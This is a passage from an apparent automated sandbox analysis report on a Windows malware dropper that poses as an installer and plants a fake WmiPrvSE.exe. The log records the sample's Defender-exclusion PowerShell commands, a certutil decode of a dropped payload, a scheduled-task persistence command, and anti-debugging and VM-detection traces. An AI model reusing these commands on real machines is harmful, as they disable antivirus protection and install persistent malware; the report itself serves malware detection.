                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 897684
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 897578
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 897448
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 897340
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 897233
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 897112
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 897000
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 896890
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 896779
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 896671
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 896562
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 896432
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 900000
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 899889
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 899781
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 899665
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 899561
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 899453
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 899344
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 899219
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 899109
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 898997
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 898850
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 898714
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 898576
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 898466
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 898359
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 898242
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 898125
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 898015
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 897902
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 897795
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 897672
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 897563
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 897453
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 897343
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 897234
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 897105
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 897000
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 896890
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 896770
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\Public\WmiPrvSE.exeThread delayed: delay time: 60000
                Source: aipackagechainer.exe, 00000004.00000002.1446471405.0000000000DEC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}N
                Source: WmiPrvSE.exe, 00000017.00000002.3871035138.000000000083C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
                Source: aipackagechainer.exe, 00000004.00000002.1446471405.0000000000DEC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                Source: powershell.exe, 00000009.00000002.1611147208.0000000006EF4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1615957365.0000000007DB0000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1691655729.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1859502443.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2786498639.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2702600047.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1774623238.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2193216521.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2744623374.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2069006848.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2614937061.000000000088A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: Desktop.exe, 00000005.00000003.1435021839.000002EF11311000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000015.00000003.1508246755.0000019C56468000.00000004.00000020.00020000.00000000.sdmp, NDTCN1.dat.5.drBinary or memory string: OoXQkMoyUnLhWlT+LXGI2ToyIOGNhRJSzf8EUsFBB1IWUQemuV7nJrF2l62BXu+l
                Source: WmiPrvSE.exe, 00000017.00000003.1691655729.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1859502443.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2786498639.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2702600047.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1774623238.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2193216521.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2744623374.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2069006848.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2614937061.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2027594782.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2915107075.000000000088A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW_@<J
                Source: powershell.exe, 00000009.00000002.1611147208.0000000006EF4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW)]=
                Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Source: C:\Users\Public\WmiPrvSE.exeDebugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleep
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: 4_2_000CA05B IsDebuggerPresent,OutputDebugStringW,4_2_000CA05B
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: 4_2_00088880 CreateFileW,GetLastError,OutputDebugStringW,OutputDebugStringW,SetFilePointer,FlushFileBuffers,WriteFile,WriteFile,FlushFileBuffers,WriteFile,FlushFileBuffers,OutputDebugStringW,WriteFile,WriteFile,FlushFileBuffers,FlushFileBuffers,WriteFile,FlushFileBuffers,WriteFile,FlushFileBuffers,4_2_00088880
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: 4_2_00087860 LoadLibraryW,GetProcAddress,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,LoadImageW,FreeLibrary,4_2_00087860
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: 4_2_000CA36E mov esi, dword ptr fs:[00000030h]4_2_000CA36E
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: 4_2_000DAAA5 mov ecx, dword ptr fs:[00000030h]4_2_000DAAA5
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: 4_2_000DFC5F mov eax, dword ptr fs:[00000030h]4_2_000DFC5F
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: 4_2_000DFCA3 mov eax, dword ptr fs:[00000030h]4_2_000DFCA3
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: 4_2_000CA3DA GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,4_2_000CA3DA
                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe "C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: 4_2_000CC509 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_000CC509
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: 4_2_0006CAC0 __set_se_translator,SetUnhandledExceptionFilter,4_2_0006CAC0
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: 4_2_000CD34D IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_000CD34D
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: 4_2_000CD4E0 SetUnhandledExceptionFilter,4_2_000CD4E0
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: 4_2_000D1673 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_000D1673
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeCode function: 5_2_00007FF7BB262510 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00007FF7BB262510
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeCode function: 5_2_00007FF7BB263354 SetUnhandledExceptionFilter,5_2_00007FF7BB263354
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeCode function: 5_2_00007FF7BB263170 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FF7BB263170
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeCode function: 5_2_00007FF7BB2676D8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FF7BB2676D8
                Source: C:\Users\Public\WmiPrvSE.exeCode function: 23_2_00401180 Sleep,Sleep,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_initterm,GetStartupInfoA,23_2_00401180
                Source: C:\Users\Public\WmiPrvSE.exeCode function: 23_2_00401A70 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,23_2_00401A70
                Source: C:\Users\Public\WmiPrvSE.exeCode function: 23_2_004542E4 SetUnhandledExceptionFilter,23_2_004542E4
                Source: C:\Users\Public\WmiPrvSE.exeCode function: 23_2_00402F62 SetUnhandledExceptionFilter,23_2_00402F62
                Source: C:\Users\Public\WmiPrvSE.exeCode function: 23_2_007924F0 SetUnhandledExceptionFilter,23_2_007924F0
                Source: C:\Users\Public\WmiPrvSE.exeCode function: 23_2_007924D8 RtlLookupFunctionEntry,SetUnhandledExceptionFilter,23_2_007924D8
                Source: C:\Users\Public\WmiPrvSE.exeCode function: 23_2_007844D0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,UnhandledExceptionFilter,23_2_007844D0

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: Yara matchFile source: Process Memory Space: WmiPrvSE.exe PID: 7928, type: MEMORYSTR
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "Add-MpPreference -ExclusionPath 'C:\Users\Public'"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "Add-MpPreference -ExclusionPath 'C:\Users\Public'"Jump to behavior
                Source: C:\Users\Public\WmiPrvSE.exeCode function: 23_2_0077DF50 LogonUserA,GetLastError,ImpersonateLoggedOnUser,GetLastError,23_2_0077DF50
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: 4_2_000A9360 GetWindowsDirectoryW,GetForegroundWindow,ShellExecuteExW,ShellExecuteExW,GetModuleHandleW,GetProcAddress,GetProcessId,AllowSetForegroundWindow,4_2_000A9360
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -NoLogo -ExecutionPolicy RemoteSigned -Command "C:\Windows\SystemTemp\AI_4A51.ps1 -paths 'C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\file_deleter.ps1','C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe','C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE','C:\Users\user\AppData\Roaming\WmiPrvSE' -retry_count 10"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\WmiPrvSE.bat" "Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "Add-MpPreference -ExclusionPath 'C:\Users\Public'"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "Add-MpPreference -ExclusionExtension 'C:\Users\Public\WmiPrvSE.exe'"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\certutil.exe certutil -decode C:\Users\Public\NDTCN1.dat C:\Users\Public\WmiPrvSE.exeJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SchTasks /Create /SC DAILY /TN WmiPrvSE /TR "C:\Users\Public\WmiPrvSE.exe" /ST 19:00 /fJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\WmiPrvSE.exe C:\Users\Public\WmiPrvSE.exeJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfileJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfileJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfileJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfileJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -noprofile -noninteractive -nologo -executionpolicy remotesigned -command "c:\windows\systemtemp\ai_4a51.ps1 -paths 'c:\users\user\appdata\roaming\wmiprvse\wmiprvse\prerequisites\file_deleter.ps1','c:\users\user\appdata\roaming\wmiprvse\wmiprvse\prerequisites\aipackagechainer.exe','c:\users\user\appdata\roaming\wmiprvse\wmiprvse','c:\users\user\appdata\roaming\wmiprvse' -retry_count 10"
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -noprofile -noninteractive -nologo -executionpolicy remotesigned -command "c:\windows\systemtemp\ai_4a51.ps1 -paths 'c:\users\user\appdata\roaming\wmiprvse\wmiprvse\prerequisites\file_deleter.ps1','c:\users\user\appdata\roaming\wmiprvse\wmiprvse\prerequisites\aipackagechainer.exe','c:\users\user\appdata\roaming\wmiprvse\wmiprvse','c:\users\user\appdata\roaming\wmiprvse' -retry_count 10"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: 4_2_000827B0 GetCurrentProcess,OpenProcessToken,GetLastError,GetTokenInformation,GetTokenInformation,GetLastError,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,GetLastError,FindCloseChangeNotification,4_2_000827B0
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: 4_2_000CCFE0 cpuid 4_2_000CCFE0
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,4_2_000E68CB
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: GetLocaleInfoW,4_2_000E6AC6
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: EnumSystemLocalesW,4_2_000E6B6D
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: EnumSystemLocalesW,4_2_000E6BB8
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: EnumSystemLocalesW,4_2_000E6C53
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,4_2_000E6CDE
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: GetLocaleInfoW,GetLocaleInfoW,4_2_000AED70
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: GetLocaleInfoW,4_2_000E6F31
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,4_2_000E705A
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: GetLocaleInfoW,4_2_000E7160
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,4_2_000E722F
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: EnumSystemLocalesW,4_2_000DD78E
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: GetLocaleInfoW,4_2_000DDCD5
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeCode function: GetLocaleInfoW,GetNumberFormatW,5_2_00007FF7BB25A2CC
                Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ScheduledJob\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ScheduledJob.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
